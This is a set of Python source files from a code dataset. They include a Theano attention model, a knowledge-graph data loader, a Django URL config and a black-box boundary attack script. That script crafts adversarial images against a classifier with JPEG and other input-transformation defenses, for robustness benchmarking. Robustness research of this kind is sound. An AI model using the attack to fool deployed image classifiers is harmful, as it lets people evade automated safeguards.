self.approx_embedder(self.x_data)\n self.h_enc = T.concatenate([self.h_enc_basic, self.h_enc_emb], axis=2)\n [self.pt, self.ot, self.alpha] = self.decode()\n \n self.cost = self.build_cost(self.pt,\n self.y_data)\n self.updates = self.compute_updates(self.cost, self.params)\n \n def init_params(self):\n self.W_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.word_dim, self.emb_dim), name='W_emb'+self.name))\n self.H_enc = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.h_dim), name='H_enc'+self.name))\n self.P_enc = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.emb_dim, self.h_dim), name='P_enc'+self.name))\n self.U = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, (self.h_dim + self.emb_dim), self.h_dim), name='U_dec'+self.name))\n self.O_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, (self.h_dim + self.emb_dim), self.h_dim), name='O_z_dec'+self.name))\n self.out_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.out_dim), name='out_emb'+self.name))\n self.b = add_to_params(self.params, theano.shared(value=np.zeros((self.h_dim,), dtype='float32'), name='b'+self.name))\n self.b = self.b.dimshuffle('x', 'x', 0)\n self.encode_b = add_to_params(self.params, theano.shared(value=np.zeros((self.h_dim,), dtype='float32'), name='encode_b'+self.name))\n self.reg_term = T.sum(self.H_enc**2) + T.sum(self.P_enc**2) + T.sum(self.U**2) + T.sum(self.O_z**2) + T.sum(self.b**2) + T.sum(self.encode_b**2)\n\n def approx_embedder(self, x):\n return self.W_emb[x]\n\n def encode(self, x_data, mask):\n if self.test_mode:\n batch_size = 2\n else:\n batch_size = self.bs\n emb_x = self.approx_embedder(x_data)\n def encode_step(x_t, h_tm1):\n h_t = self.active(T.dot(h_tm1, self.H_enc) + \\\n T.dot(x_t, self.P_enc) + \\\n self.encode_b)\n return h_t\n h_0 = T.alloc(np.float32(0), batch_size, self.h_dim)\n h_enc, _ = theano.scan(encode_step, \\\n sequences=[emb_x], \\\n outputs_info=[h_0])\n return h_enc\n\n def decode_step(self, h_enc, xmask, b):\n tmp = T.dot(h_enc, self.U)\n beta_t = T.sum(b * tmp, axis=2)\n alpha_t = T.exp(beta_t) * xmask / T.sum(T.exp(beta_t) * xmask, axis=0)\n z_tmp = h_enc * (alpha_t).dimshuffle(0, 1, 'x')\n z_t = T.sum(z_tmp, axis=0)\n g_t = T.dot(T.dot(z_t, self.O_z), self.out_emb)\n p_t = SoftMax(g_t)\n o_t = p_t.argmax(axis=1)\n return [p_t, o_t, alpha_t]\n \n def decode(self):\n batch_size = self.bs\n h_enc = self.h_enc\n xmask = self.xmask\n \n [p_t, o_t, alpha] = self.decode_step(h_enc, xmask, self.b)\n return [p_t, o_t, alpha]\n \n def build_cost(self, ot, abs_out):\n lamb = 0.01\n x_flatten = ot\n y_flatten = abs_out\n\n cost = x_flatten[T.arange(y_flatten.shape[0]), \\\n y_flatten]\n neg_log_cost_sum = T.sum(-T.log(cost))\n cost_res = neg_log_cost_sum / self.bs + lamb * self.reg_term\n\n self.pred = x_flatten.argmax(axis=1)\n self.acc = 1.0 * T.sum(T.eq(self.pred, y_flatten)) / self.bs\n return cost_res\n\n def build_train_function(self):\n if not hasattr(self, 'train_fn'):\n self.train_fn = \\\n theano.function(inputs=[self.x_data,\n self.xmask,\n self.y_data],\n outputs=[self.cost, \\\n self.acc],\n updates=self.updates,\n name=\"train_fn\")\n return self.train_fn\n\n def build_eval_function(self):\n if not hasattr(self, 'eval_fn'):\n self.eval_fn = \\\n theano.function(inputs=[self.x_data,\n self.xmask,\n self.y_data],\n outputs=[self.cost, \\\n self.acc],\n name=\"eval_fn\")\n return self.eval_fn\n\n def compute_updates(self, training_cost, params):\n updates = []\n \n grads = T.grad(training_cost, params)\n grads = OrderedDict(zip(params, grads))\n\n # Clip stuff\n c = numpy.float32(self.cutoff)\n clip_grads = []\n \n norm_gs = T.sqrt(sum(T.sum(g ** 2) for p, g in grads.items()))\n normalization = T.switch(T.ge(norm_gs, c), c / norm_gs, np.float32(1.))\n notfinite = T.or_(T.isnan(norm_gs), T.isinf(norm_gs))\n \n for p, g in grads.items():\n clip_grads.append((p, T.switch(notfinite, numpy.float32(.1) * p, g * normalization)))\n \n grads = OrderedDict(clip_grads)\n\n if self.updater == 'adagrad':\n updates = Adagrad(grads, self.lr) \n elif self.updater == 'sgd':\n raise Exception(\"Sgd not implemented!\")\n elif self.updater == 'adadelta':\n updates = Adadelta(grads)\n elif self.updater == 'rmsprop':\n updates = RMSProp(grads, self.lr)\n elif self.updater == 'adam':\n updates = Adam(grads)\n else:\n raise Exception(\"Updater not understood!\") \n\n return updates\n","sub_path":"attention_NLU/whenst_hour_model.py","file_name":"whenst_hour_model.py","file_ext":"py","file_size_in_byte":6984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"60412698","text":"from __future__ import print_function\ntry:\n\traw_input\nexcept:\n\traw_input = input\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nfrom keras.datasets import mnist\nimport pickle\nimport time\nimport datetime\nimport os\nfrom PIL import Image\nimport json\nimport sys\nfrom robustml_model import InputTransformations\n\nimport tensorflow as tf\n\n\nimport robustml\n\n\ndef orthogonal_perturbation(delta, prev_sample, target_sample):\n\tprev_sample = prev_sample.reshape(299, 299, 3)\n\t# Generate perturbation\n\tperturb = np.random.randn(299, 299, 3)\n\tperturb /= get_diff(perturb, np.zeros_like(perturb))\n\tperturb *= delta * np.mean(get_diff(target_sample, prev_sample))\n\t# Project perturbation onto sphere around target\n\tdiff = (target_sample - prev_sample).astype(np.float32)\n\tdiff /= get_diff(target_sample, prev_sample)\n\tdiff = diff.reshape(3, 299, 299)\n\tperturb = perturb.reshape(3, 299, 299)\n\tfor i, channel in enumerate(diff):\n\t\tperturb[i] -= np.dot(perturb[i], channel) * channel\n\t# Check overflow and underflow\n# \tmean = [103.939, 116.779, 123.68]\n\tmean = [0.0, 0.0, 0.0]\n\tperturb = perturb.reshape(299, 299, 3)\n\toverflow = (prev_sample + perturb) - np.concatenate((np.ones((299, 299, 1)) * (255. - mean[0]), np.ones((299, 299, 1)) * (255. - mean[1]), np.ones((299, 299, 1)) * (255. - mean[2])), axis=2)\n\toverflow = overflow.reshape(299, 299, 3)\n\tperturb -= overflow * (overflow > 0)\n\tunderflow = np.concatenate((np.ones((299, 299, 1)) * (0. - mean[0]), np.ones((299, 299, 1)) * (0. - mean[1]), np.ones((299, 299, 1)) * (0. - mean[2])), axis=2) - (prev_sample + perturb)\n\tunderflow = underflow.reshape(299, 299, 3)\n\tperturb += underflow * (underflow > 0)\n\treturn perturb\n\ndef forward_perturbation(epsilon, prev_sample, target_sample):\n\tperturb = (target_sample - prev_sample).astype(np.float32)\n\tperturb /= get_diff(target_sample, prev_sample)\n\tperturb *= epsilon\n\treturn perturb\n\ndef get_converted_prediction(sample, classifier):\n\tsample = sample.reshape(299, 299, 3)\n\tmean = [103.939, 116.779, 123.68]\n\tsample[..., 0] += mean[0]\n\tsample[..., 1] += mean[1]\n\tsample[..., 2] += mean[2]\n\tsample = sample[..., ::-1].astype(np.uint8)\n\tsample = sample.astype(np.float32).reshape(1, 299, 299, 3)\n\tsample = sample[..., ::-1]\n\tmean = [103.939, 116.779, 123.68]\n\tsample[..., 0] -= mean[0]\n\tsample[..., 1] -= mean[1]\n\tsample[..., 2] -= mean[2]\n\tlabel = decode_predictions(classifier.predict(sample), top=1)[0][0][1]\n\treturn label\n\ndef draw(sample, classifier, folder):\n\tlabel = get_converted_prediction(np.copy(sample), classifier)\n\tsample = sample.reshape(299, 299, 3)\n\t# Reverse preprocessing, see https://github.com/keras-team/keras/blob/master/keras/applications/imagenet_utils.py\n\tmean = [103.939, 116.779, 123.68]\n\tsample[..., 0] += mean[0]\n\tsample[..., 1] += mean[1]\n\tsample[..., 2] += mean[2]\n\tsample = sample[..., ::-1].astype(np.uint8)\n\t# Convert array to image and save\n\tsample = Image.fromarray(sample)\n\tid_no = time.strftime('%Y%m%d_%H%M%S', datetime.datetime.now().timetuple())\n\t# Save with predicted label for image (may not be adversarial due to uint8 conversion)\n\tsample.save(os.path.join(\"images\", folder, \"{}_{}.png\".format(id_no, label)))\n\ndef preprocess(sample_path):\n\timg = image.load_img(sample_path, target_size=(299, 299))\n\tx = image.img_to_array(img)\n\tx = np.expand_dims(x, axis=0)\n\tx = preprocess_input(x)\n\treturn x\n\ndef get_diff(sample_1, sample_2):\n\tsample_1 = sample_1/255\n\tsample_2 = sample_2/255\n\tsample_1 = sample_1.reshape(3, 299, 299)\n\tsample_2 = sample_2.reshape(3, 299, 299)\n\tdiff = []\n\tfor i, channel in enumerate(sample_1):\n\t\tdiff.append(np.linalg.norm((channel - sample_2[i]).astype(np.float32)))\n\treturn np.array(diff)\n\ndef boundary_attack():\n\t\n\t\n\t\n\n\tl2thresh = 0.05 * np.sqrt(299*299)\n\n\n\tconfig = tf.ConfigProto()\n\tconfig.gpu_options.allow_growth = True\n\tsess = tf.Session(config=config)\n\n\tdefense = 'jpeg' # 'bitdepth | jpeg | crop | quilt | tv' ############# change ##############################\n\tmodel = InputTransformations(sess,defense)\n\timagenet_path = '../imagenetval'\n\t\n\tprovider = robustml.provider.ImageNet(imagenet_path, model.dataset.shape)\n\n\tstart = 0\n\tend = 500\n\twrongexample = 0\n\ttotalImages = 0\n\tsuccImages = 0\n\tfor i in range(start,end):\n\t\tinputs, targets = provider[i]\n\t\tlogits = model.outlogits(inputs.reshape(1,299,299,3))\n\t\tprint('evaluating %d of [%d, %d]' % (i, start, end))\n\t\tsys.stdout.flush()\n\n\t\tif np.argmax(logits) != targets:\n\t\t\twrongexample += 1\n\t\t\tprint('skip the wrong example ', i)\n\t\t\tsys.stdout.flush()\n\t\t\tcontinue\n\t\t\t \n\t\ttotalImages += 1\n\t\ttarget_tem = i+1\n\t\twhile True:\n\t\t\ttarget_x, target_y = provider[target_tem]\n\t\t\tif target_y != targets:\n\t\t\t\tbreak\n\t\t\ttarget_tem += 1\n\t\t\n\t\t\t\n\t\tinitial_sample = inputs * 255\n\t\ttarget_sample = target_x * 255\n\t \t\n\t\tfolder = time.strftime('%Y%m%d_%H%M%S', datetime.datetime.now().timetuple())\n\t\tos.mkdir(os.path.join(\"images\", folder))\n# \t\tdraw(np.copy(initial_sample), classifier, folder)\n\t\tattack_class = np.argmax(model.outlogits(initial_sample.reshape(1,299,299,3)/255))\n\t\ttarget_class = np.argmax(model.outlogits(target_sample.reshape(1,299,299,3)/255))\n\t \n\t\tadversarial_sample = initial_sample\n\t\tn_steps = 0\n\t\tn_calls = 0\n\t\tepsilon = 1.\n\t\tdelta = 0.5\n\t \n\t\t# Move first step to the boundary\n\t\twhile True:\n\t\t\ttrial_sample = adversarial_sample + forward_perturbation(epsilon * get_diff(adversarial_sample, target_sample), adversarial_sample, target_sample)\n\t\t\tprediction = model.outlogits(trial_sample.reshape(1, 299, 299, 3)/255)\n\t\t\tn_calls += 1\n\t\t\tif np.argmax(prediction) == attack_class:\n\t\t\t\tadversarial_sample = trial_sample\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tepsilon *= 0.9\n\t \n# \t\twhile True:\n# \t\t\tprint(\"Step #{}...\".format(n_steps))\n# \t\t\tprint(\"\\tDelta step...\")\n\t\tsuccessflag = False\n\t\tfor attack_step in range(2000):\n\t\t\td_step = 0\n\t\t\twhile True:\n\t\t\t\td_step += 1\n# \t\t\t\tprint(\"\\t#{}\".format(d_step))\n\t\t\t\ttrial_samples = []\n\t\t\t\tfor i in np.arange(10):\n\t\t\t\t\ttrial_sample = adversarial_sample + orthogonal_perturbation(delta, adversarial_sample, target_sample)\n\t\t\t\t\ttrial_samples.append(trial_sample)\n\t\t\t\tpredictions = model.outlogits(np.array(trial_samples).reshape(-1, 299, 299, 3)/255)\n\t\t\t\tn_calls += 10\n\t\t\t\tpredictions = np.argmax(predictions, axis=1)\n\t\t\t\td_score = np.mean(predictions == attack_class)\n\t\t\t\tif d_score > 0.0:\n\t\t\t\t\tif d_score < 0.3:\n\t\t\t\t\t\tdelta *= 0.9\n\t\t\t\t\telif d_score > 0.7:\n\t\t\t\t\t\tdelta /= 0.9\n\t\t\t\t\tadversarial_sample = np.array(trial_samples)[np.where(predictions == attack_class)[0][0]]\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tdelta *= 0.9\n# \t\t\tprint(\"\\tEpsilon step...\")\n\t\t\te_step = 0\n\t\t\twhile True:\n\t\t\t\te_step += 1\n# \t\t\t\tprint(\"\\t#{}\".format(e_step))\n\t\t\t\ttrial_sample = adversarial_sample + forward_perturbation(epsilon * get_diff(adversarial_sample, target_sample), adversarial_sample, target_sample)\n\n\t\t\t\tprediction = model.outlogits(trial_sample.reshape(1, 299, 299, 3)/255)\t\t\t\t\n\t\t\t\tn_calls += 1\n\t\t\t\tif np.argmax(prediction) == attack_class:\n\t\t\t\t\tadversarial_sample = trial_sample\n\t\t\t\t\tepsilon /= 0.5\n\t\t\t\t\tbreak\n\t\t\t\telif e_step > 500:\n\t\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tepsilon *= 0.5\n\t\t\tn_steps += 1\n# \t\t\tchkpts = [1, 5, 10, 50, 100, 500, 1000]\n# \t\t\tif (n_steps in chkpts) or (n_steps % 500 == 0):\n# \t\t\t\tprint(\"{} steps\".format(n_steps))\n# \t\t\t\tdraw(np.copy(adversarial_sample), classifier, folder)\n\t\t\tdiff = np.mean(get_diff(adversarial_sample, target_sample))\n\t\t\trealdiff = np.sum((adversarial_sample/255 - target_sample/255 )**2)**0.5\n\t\t\tif e_step > 500:\n\t\t\t\tprint(\"{} steps\".format(n_steps))\n\t\t\t\tprint(\"Mean Squared Error: {}\".format(diff))\n\t\t\t\tsys.stdout.flush()\n# \t\t\t\tdraw(np.copy(adversarial_sample), classifier, folder)\n\t\t\t\tbreak\n\t\t\tif realdiff <= l2thresh:\n\t\t\t\tsuccessflag = True\n\t\t\t\tsuccImages += 1\n\t\t\t\tprint('clipimage succImages: '+str(succImages)+' totalImages: '+str(totalImages))\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tbreak\n\t\t\tif attack_step % 50 == 0:\n\t\t\t\tprint(\"Mean Squared Error: {}\".format(diff))\n\t\t\t\tprint(\"{} steps\".format(n_steps))\n\t\t\t\tprint(\"Real Mean Squared Error: {}\".format(realdiff))\n# \t\t\t\tprint(\"Calls: {}\".format(n_calls))\n\t\t\t\tprint(\"Attack Class: {}\".format(attack_class))\n\t\t\t\tprint(\"Target Class: {}\".format(target_class))\n\t\t\t\tprint(\"Adversarial Class: {}\".format(np.argmax(prediction)))\n\t\t\t\tsys.stdout.flush()\n\tprint(wrongexample)\n \t\n\n\n\n\nif __name__ == \"__main__\":\n\tboundary_attack()\n\n\n\n\n\n","sub_path":"boundary-attack-input.py","file_name":"boundary-attack-input.py","file_ext":"py","file_size_in_byte":8244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"148990466","text":"import numpy as np\nfrom matplotlib.pyplot import figure, show\nfrom matplotlib.patches import Arc\nfrom matplotlib.cm import copper\n\nfig = figure()\nframe = fig.add_subplot(1,1,1)\nn = 2000\nx = np.random.random_sample(n)\ny = np.random.random_sample(n)\nradius = x**2 + y**2\nIn = (radius <= 1.0)\nOut = (radius > 1.0)\nframe.plot(x[In], y[In], 'g.')\nframe.plot(x[Out], y[Out], 'r.')\narc = Arc((0,0), 2,2, 0,0, 90)\nframe.add_patch(arc)\nframe.imshow([[0, 0],[1,1]], interpolation='bicubic', cmap=copper,\n vmin=-0.5, vmax=0.5,\n extent=(frame.get_xlim()[0], frame.get_xlim()[1],\n frame.get_ylim()[0], frame.get_ylim()[1]),\n alpha=1)\n\nframe.set_xlim(0,1)\nframe.set_ylim(0,1)\nframe.set_aspect(1.0)\nshow()\n","sub_path":"docs/tools/ReST/template/circlemc.py","file_name":"circlemc.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"309233876","text":"# https://github.com/Namkyeong/RecSys_paper/blob/main/MatrixFactorization/data.py\n\nimport sys\nsys.path.append(\"..\")\n\nimport numpy as np\nimport pandas as pd\n\n# pass in column names for each CSV\nr_cols = ['user_id', 'movie_id', 'rating', 'unix_timestamp']\ndf = pd.read_csv('ml-100k/u.data', sep='\\t', names=r_cols)\ntrain_df = pd.read_csv('ml-100k/ua.base', sep='\\t', names=r_cols)\ntest_df = pd.read_csv('ml-100k/ua.test', sep='\\t', names=r_cols)\n\nn_users = df.user_id.unique().shape[0]\nn_movies = df.movie_id.unique().shape[0]\n\nml_100k = np.zeros((n_users, n_movies))\ntrain = np.zeros((n_users, n_movies))\ntest = np.zeros((n_users, n_movies))\n\nfor row in df.itertuples():\n ml_100k[row[1]-1, row[2]-1] = row[3]\n\nfor row in train_df.itertuples():\n train[row[1]-1, row[2]-1] = row[3]\n \nfor row in test_df.itertuples():\n test[row[1]-1, row[2]-1] = row[3]\n\n ","sub_path":"RecSys/PMF/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605932342","text":"from django.conf.urls import patterns, url\nfrom etests import views\n\nurlpatterns = patterns('',\n url(r'^testset/$', views.testset, name='testset'),\n url(r'^testset/new$', views.testset_create, name='testset_new'),\n url(r'^testset/edit/(?P\\d+)$', views.testset_update, name='testset_edit'),\n url(r'^testset/delete/(?P\\d+)$', views.testset_delete, name='testset_delete'),\n url(r'^testsetline/edit/(?P\\d+)$', views.testsetline_update, name='testsetline_edit'),\n url(r'^testsetline/delete/(?P\\d+)$', views.testsetline_delete, name='testsetline_delete'),\n url(r'^testq/$', views.testq, name='testq'),\n url(r'^etest/$', views.etest, name='etest'),\n url(r'^etest/(\\d{1,2})/$', views.etest, name='etest'),\n url(r'^etest/testlist$', views.testlist, name='testlist'),\n url(r'^etest/sr/(\\d{1,2})/$', views.etestsr, name='etestsr'),\n url(r'^etest/ans/(\\d{1,2})/$', views.etestans, name='etestans'),\n url(r'^etest/add/$', views.add_testset, name='add_testset'),\n url(r'^etest/phoneticslist$', views.phoneticslist, name='phoneticslist'),\n #url(r'^etest/phonetics_display$', views.phonetics_display, name='phonetics_display'),\n url(r'^etest/phonetics/(\\d{1,2})/$', views.phonetics, name='phone'),\n )\n","sub_path":"tinytotts/etests/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"539171380","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('shop', '0052_auto_20150325_1445'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='supplier',\n name='bank_data',\n field=models.TextField(null=True, verbose_name=b'\\xd0\\x91\\xd0\\xb0\\xd0\\xbd\\xd0\\xba\\xd0\\xbe\\xd0\\xb2\\xd1\\x81\\xd0\\xba\\xd0\\xb8\\xd0\\xb5 \\xd1\\x80\\xd0\\xb5\\xd0\\xba\\xd0\\xb2\\xd0\\xb8\\xd0\\xb7\\xd0\\xb8\\xd1\\x82\\xd1\\x8b', blank=True),\n ),\n migrations.AlterField(\n model_name='supplier',\n name='contact',\n field=models.TextField(null=True, verbose_name=b'\\xd0\\x9a\\xd0\\xbe\\xd0\\xbd\\xd1\\x82\\xd0\\xb0\\xd0\\xba\\xd1\\x82\\xd0\\xbd\\xd0\\xbe\\xd0\\xb5 \\xd0\\xbb\\xd0\\xb8\\xd1\\x86\\xd0\\xbe', blank=True),\n ),\n migrations.AlterField(\n model_name='supplier',\n name='fact_address',\n field=models.TextField(null=True, verbose_name=b'\\xd0\\xa4\\xd0\\xb0\\xd0\\xba\\xd1\\x82\\xd0\\xb8\\xd1\\x87\\xd0\\xb5\\xd1\\x81\\xd0\\xba\\xd0\\xb8\\xd0\\xb9 \\xd0\\xb0\\xd0\\xb4\\xd1\\x80\\xd0\\xb5\\xd1\\x81', blank=True),\n ),\n migrations.AlterField(\n model_name='supplier',\n name='law_address',\n field=models.TextField(null=True, verbose_name=b'\\xd0\\xae\\xd1\\x80\\xd0\\xb8\\xd0\\xb4\\xd0\\xb8\\xd1\\x87\\xd0\\xb5\\xd1\\x81\\xd0\\xba\\xd0\\xb8\\xd0\\xb9 \\xd0\\xb0\\xd0\\xb4\\xd1\\x80\\xd0\\xb5\\xd1\\x81', blank=True),\n ),\n ]\n","sub_path":"shop/migrations/0053_auto_20150329_1630.py","file_name":"0053_auto_20150329_1630.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"271305226","text":"'''\nID: romario5\nLANG: PYTHON\nPROG: ride\n'''\n\ndef cnt(s):\n r = 1\n for c in s:\n r *= (ord(c) - ord('A') + 1)\n return r % 47\n\ndef solve(comet, group):\n if cnt(comet) == cnt(group):\n return \"GO\"\n return \"STAY\"\n\ndef go():\n problem = 'ride'\n ifile = open(problem + '.in', 'r')\n ofile = open(problem + '.out', 'w')\n try:\n comet = ifile.readline()\n group = ifile.readline()\n r = solve(comet, group)\n ofile.writelines(r)\n finally:\n ofile.close()\n\n# print solve('COMETQ', 'HVNGAT')\ngo()\n","sub_path":"ride.py","file_name":"ride.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"446240859","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom collections import Counter\nfrom torch.utils import data\nimport torch\nimport torch.nn as nn\nimport numpy as np\n#import graph\n\ndef sample_or_pad(arr, max_size, pad_value = -1):\n arr_shape = arr.shape\n\n if arr.size == 0:\n\n if isinstance(pad_value, list):\n result = np.ones((max_size, len(pad_value)), dtype = arr.dtype) * pad_value\n \n else:\n\n result = np.ones((max_size,), dtype = arr.dtype) * pad_value\n\n elif arr.shape[0]>max_size:\n\n if arr.ndim == 1:\n result = np.random.choice(arr, size = max_size, replace = False)\n else:\n \n idx = np.arange(arr.shape[0])\n np.random.shuffle(idx)\n result = arr[idx[:max_size], :]\n else:\n padding = np.ones((max_size - arr.shape[0],) + arr_shape[1:], dtype = arr.dtype)\n\n if isinstance(pad_value, list):\n for i in range(len(pad_value)):\n padding[..., i] *= pad_value[i]\n else:\n padding *= pad_value\n result = np.concatenate((arr, padding), axis = 0)\n\n return result \ndef get_graph_nbrhd_with_rels(train_graph, ent, exclude_tuple):\n \"\"\"Helper to get neighbor (rels, ents) excluding a particular tuple.\"\"\"\n es, er, et = exclude_tuple\n neighborhood = [[r, nbr] for nbr in train_graph.kg_data[ent]\n for r in train_graph.kg_data[ent][nbr]\n # if r != er]\n if ent != es or nbr != et or r != er]\n if not neighborhood:\n neighborhood = [[]]\n # if train_graph.add_reverse_graph:\n # rev_nighborhood = [nbr for nbr in train_graph.reverse_kg_data[ent]\n # if ent != et or nbr != es or\n # # er not in train_graph.reverse_kg_data[ent][nbr]]\n # (train_graph.reverse_kg_data[ent][nbr] - set([er]))]\n # neighborhood += rev_nighborhood\n neighborhood = np.array(neighborhood, dtype=np.int)\n return neighborhood\n\ndef get_graph_nbrhd(train_graph, ent, exclude_tuple):\n es, er, et = exclude_tuple\n\n neighbourhood = [nbr for nbr in train_graph.kg_data[ent]\n if ent != es or nbr != et or \n er not in train_graph.kg_data[ent][nbr]]\n #(train_graph.kg_data[ent][nbr] - set([er]))]\n \n neighbourhood = np.array(list(set(neighbourhood)), dtype = np.int)\n \n return neighbourhood\n\n\nclass MyDataset(data.Dataset):\n\n def __init__(self, data_graph, train_graph=None, mode=\"train\",\n max_negatives=10, max_neighbours=10, num_epochs=20,\n batchsize=64, model_type=\"attention\", val_graph=None, add_inverse = False):\n\n if not train_graph:\n train_graph = data_graph\n \n self.train_graph = train_graph\n self.data_graph = data_graph\n self.mode = mode\n self.augmented_tuple_store = None\n self.add_inverse = add_inverse\n\n\n if mode != \"train\":\n\n if max_negatives:\n self.max_negatives = max_negatives\n else:\n self.max_negatives = train_graph.ent_vocab_size-1\n\n else:\n if not max_negatives and mode == \"train\":\n\n raise ValueError(\"Must provide max_negatives value for training\")\n \n self.max_negatives = max_negatives\n \n if max_neighbours:\n self.max_neighbours = max_neighbours\n else:\n self.max_neighbours = train_graph.max_neighbours\n self.input_tensors = None\n self.output_shapes = None\n self.model_type = model_type\n self.val_graph = val_graph\n\n # if mode == \"train\":\n # self.augmented_tuple_store = []\n # for example in train_graph.tuple_store:\n # s, r, t = example\n # self.augmented_tuple_store.append((s,r,t, True))\n # self.augmented_tuple_store.append((s,r,t, False))\n \n # self.augmented_tuple_store = np.array(self.augmented_tuple_store)\n \n #print(self.augmented_tuple_store)\n\n if mode == \"train\" and self.add_inverse:\n self.augmented_tuple_store = []\n for example in train_graph.tuple_store:\n s, r, t = example\n self.augmented_tuple_store.append((s,r,t, True))\n self.augmented_tuple_store.append((s,r,t, False))\n \n self.augmented_tuple_store = np.array(self.augmented_tuple_store)\n \n\n \n \n def featurize_example(self, example_tuple):\n\n s, r, t, reverse = example_tuple\n\n if not reverse:\n all_targets = self.train_graph.all_reachable_e2[(s, r)]\n if self.mode != \"train\":\n all_targets |= self.data_graph.all_reachable_e2[(s,r)]\n if self.val_graph:\n all_targets |= self.val_graph.all_reachable_e2[(s,r)]\n \n else:\n\n all_targets = self.train_graph.all_reachable_e2_reverse[(t,r)]\n\n if self.mode != \"train\":\n\n all_targets |= self.data_graph.all_reachable_e2_reverse[(t,r)]\n\n if self.val_graph:\n all_targets |= self.val_graph.all_reachable_e2_reverse[(t,r)]\n \n s, t = t, s\n\n candidate_negatives = list(self.train_graph.all_entities - (all_targets | set([t]) | set([self.train_graph.ent_pad])))\n negatives = sample_or_pad(np.array(candidate_negatives, dtype = np.int), self.max_negatives, pad_value = self.train_graph.ent_pad)\n\n\n candidates = np.insert(negatives, 0, t, axis = 0)\n\n nbrhd_fn = get_graph_nbrhd_with_rels\n #pad_value = self.train_graph.ent_pad\n pad_value = [self.train_graph.rel_pad, self.train_graph.ent_pad]\n\n nbrs_s = sample_or_pad(nbrhd_fn(self.train_graph, s, (s,r,t)), self.max_neighbours, pad_value = pad_value)\n # nbrs_t = sample_or_pad(nbrhd_fn(self.train_graph, t, (s,r,t)), self.max_neighbours, pad_value = pad_value)\n # nbrs_negatives = np.array([sample_or_pad(nbrhd_fn(self.train_graph, cand, (s,r,t)), \n # self.max_neighbours, pad_value = pad_value) for cand in negatives])\n\n #nbrs_candidates = np.concatenate((np.expand_dims(nbrs_t, 0), nbrs_negatives), axis = 0)\n nbrs_candidates = np.array([], dtype=np.int)\n\n\n if self.mode != \"train\":\n labels = [t]\n \n else:\n \n labels = np.zeros(candidates.shape[0], dtype = np.int)\n labels[0] = 1\n idx = np.arange(candidates.shape[0])\n np.random.shuffle(idx)\n candidates = candidates[idx]\n\n #nbrs_candidates = nbrs_candidates[idx]\n labels = labels[idx]\n \n return s, nbrs_s, r, candidates, nbrs_candidates, labels\n\n\n def __len__(self):\n \n if self.add_inverse:\n return len(self.augmented_tuple_store)\n else:\n return len(self.data_graph.tuple_store)\n\n \n def __getitem__(self, index):\n\n if self.add_inverse:\n\n return self.featurize_example(self.augmented_tuple_store[index])\n else:\n s, r, t = self.data_graph.tuple_store[index]\n return self.featurize_example((s,r,t,True))\n\n\n ","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"391953788","text":"from random import random\nfrom math import sqrt\nfrom itertools import product\n\n\ndef calcAccuracy(gamma, d):\n return (1.0 / 2) * (1.0 + (1.0 - d) ** gamma)\n\n\ndef calcBallotProb(ballots, answer, d):\n totalProb = 1.0\n for i in range(0, len(ballots)):\n prob = 0.0\n if ballots[i] == answer:\n prob = calcAccuracy(1, d)\n else:\n prob = (1 - calcAccuracy(1, d))\n totalProb *= prob\n return totalProb\n\n\ndef normalize(array):\n sum = 0.0\n for i in range(0, len(array)):\n sum += array[i]\n for i in range(0, len(array)):\n array[i] = array[i] / sum\n return array\n\n\ndef dot(v1, v2):\n sum = 0.0\n for i in range(0, len(v1)):\n if v1[i] == '*' or v2[i] == '*':\n continue\n sum += v1[i] * v2[i]\n return sum\n\n\ndef generateBallot(gamma, d, answer):\n a = random()\n if a < calcAccuracy(gamma, d):\n return answer\n else:\n return 1 - answer\n\n\n# Generate discrete difficulties between 0 and 1 at diffInterval steps\ndef getDifficulties(diffInterval):\n difficulties = []\n numDiffs = int(1.0 / diffInterval + 1)\n for i in range(0, numDiffs):\n difficulties.append(round(diffInterval * i, 1))\n return difficulties\n\n\ndef findBestAction(actions, policy, beliefState):\n bestValue = -1230981239102938019\n bestAction = 0 #Assume there is at least one action\n for action in actions:\n if action in policy:\n value = findBestValue(action, policy[action], beliefState)\n if value > bestValue:\n bestValue = value\n bestAction = action\n return bestAction\n\n\ndef findBestValue(action, hyperplanes, beliefs):\n bestValue = -129837198273981231\n bestHyperplane = []\n for hyperplane in hyperplanes:\n dontUse = False\n for (b, entry) in zip(beliefs, hyperplane):\n if b != 0 and entry == '*':\n dontUse = True\n break\n if dontUse:\n continue\n value = dot(beliefs, hyperplane)\n if value > bestValue:\n bestHyperplane = hyperplane\n bestValue = value\n 